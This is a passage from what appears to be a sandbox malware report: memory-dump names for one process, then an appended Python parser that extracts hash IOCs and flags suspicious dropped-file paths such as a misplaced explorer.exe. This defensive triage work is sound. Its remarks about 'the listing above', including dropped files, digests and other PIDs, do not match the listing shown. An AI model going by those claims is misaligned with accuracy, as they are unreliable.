memory/1120-482-0x00007FFEF8480000-0x00007FFEF848D000-memory.dmp

memory/1120-481-0x00007FFEF7830000-0x00007FFEF7849000-memory.dmp

memory/1120-480-0x00007FFEE8D70000-0x00007FFEE8EE6000-memory.dmp

memory/1120-479-0x00007FFEF7A50000-0x00007FFEF7A74000-memory.dmp

memory/1120-478-0x00007FFEF7AC0000-0x00007FFEF7AD9000-memory.dmp

memory/1120-477-0x00007FFEF7AE0000-0x00007FFEF7B0D000-memory.dmp

memory/1120-476-0x00007FFEF8520000-0x00007FFEF852F000-memory.dmp

memory/1120-475-0x00007FFEF8560000-0x00007FFEF8585000-memory.dmp

memory/1120-474-0x00007FFEE9260000-0x00007FFEE9939000-memory.dmp

memory/1120-472-0x00007FFEF7AB0000-0x00007FFEF7ABD000-memory.dmp

memory/1120-471-0x00007FFEEF640000-0x00007FFEEF654000-memory.dmp
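The listing above is the raw evidence a responder actually works from: dropped-file paths with their digests, and memory-dump names that encode a PID and an address range. As an added example (not part of the sandbox report), the following Python parser turns that flat layout into triage data. It validates digest lengths, collects SHA-256 IOCs, tags the paths that matter here (the %TEMP%\_MEI<digits> directory into which a PyInstaller one-file bootloader unpacks its bundled DLLs, the __PSScriptPolicyTest_*.ps1 file PowerShell writes at startup when it probes script-execution policy, and a system-binary name such as explorer.exe dropped outside C:\Windows, System32 or SysWOW64, as with the explorer.exe under C:\Windows\Resources\Themes above), and computes region sizes from the memory-dump names so identical images in several PIDs stand out. SAMPLE is an excerpt of the listing above in the report's own layout; the watch-list of binary names, the allowed directories and the tag strings are this example's own choices.

```python
"""Parse a sandbox dropped-file / memory-region listing into triage data.
Added example, not part of the report. SAMPLE is an excerpt of the listing
above, kept in the report's own layout (path, blank line, MD5/SHA1/SHA256/SHA512)."""
import re
from dataclasses import dataclass, field

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\_MEI40202\api-ms-win-core-console-l1-1-0.dll

MD5 7699c096202da0db6b07fafc914d60ed
SHA1 6e952be34b9457b0cc3e4aa372d941030407a0fc
SHA256 0052515763a1a31d2527a2eb2523fb7b88d8e55c4e4da5ef352b565476bf21e0
SHA512 ae93507cae8d2096c688850d369f8ef282699770b1e27621ed8ebeede1bb285a290f1e2e06a6e9287a05c243b907371977501f1aa4181810913763e0d5bcc2c0

memory/1120-149-0x00007FFEEF640000-0x00007FFEEF654000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oicgr1s3.p2m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\Resources\Themes\explorer.exe

MD5 f34ecb224532e9537d0d045ca45a1671
SHA1 e41e8e3611d5ddbb9ec9ab6609389da34cf30dfc
SHA256 50ca6bbc0182c03eba5879422fe23628a201d8602d3ac559255faadefe6b9d46
SHA512 a25e8a4f9529200d28dbd93c31e771bfeef1312970874f3a387a3f01f51e2fdc2d98f55e1082bd61fc8e44e6cdb94015756b89ae8b5c026616ba52d9286765e0

memory/4364-451-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2892-455-0x0000000000400000-0x000000000041F000-memory.dmp
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$", re.I)
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-f]+)-0x([0-9a-f]+)-memory\.dmp$", re.I)
MEI_RE = re.compile(r"\\_MEI\d+\\", re.I)  # PyInstaller one-file extraction directory
# Assumed watch-list (this example's choice): Windows binary names that belong only in SYSTEM_DIRS.
WATCHED_NAMES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe"}
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)
    tags: list = field(default_factory=list)


@dataclass
class MemoryRegion:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def classify(path: str) -> list:
    """Tag a dropped-file path with the observations a triager would make."""
    parent, _, name = path.lower().rpartition("\\")
    tags = []
    if MEI_RE.search(path):
        tags.append("pyinstaller_extraction_dir")
    if name.startswith("__psscriptpolicytest_") and name.endswith(".ps1"):
        # PowerShell writes this file at startup to probe script-execution policy.
        tags.append("powershell_startup_artifact")
    if name in WATCHED_NAMES and parent not in SYSTEM_DIRS:
        tags.append("system_binary_name_outside_system_dirs")
    return tags


def parse_listing(text: str):
    """Return (dropped files, memory regions) from the report's flat listing."""
    files, regions, current = [], [], None
    for line in (ln.strip() for ln in text.splitlines()):
        if not line:
            continue
        if m := MEM_RE.match(line):
            regions.append(MemoryRegion(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None
        elif h := HASH_RE.match(line):
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            algo, digest = h[1].upper(), h[2].lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current.path}")
            current.hashes[algo] = digest
        else:  # any other non-blank line starts a new dropped-file record
            current = DroppedFile(path=line, tags=classify(line))
            files.append(current)
    return files, regions


def sha256_iocs(files) -> list:
    """Sorted SHA-256 digests, ready for a blocklist or hunt query."""
    return sorted(f.hashes["SHA256"] for f in files if "SHA256" in f.hashes)


def regions_by_pid(regions) -> dict:
    """Group dump ranges per PID so identical images in several processes stand out."""
    out = {}
    for r in regions:
        out.setdefault(r.pid, []).append((r.start, r.end))
    return out
```

Run it on the full listing by pasting the text into SAMPLE or reading it from a file; regions_by_pid shows that PIDs 4364, 2892, 2172, 4104 and 4724 all carry the same 0x400000-0x41F000 range, which is the kind of repetition worth checking against the process tree before deciding which dump to pull.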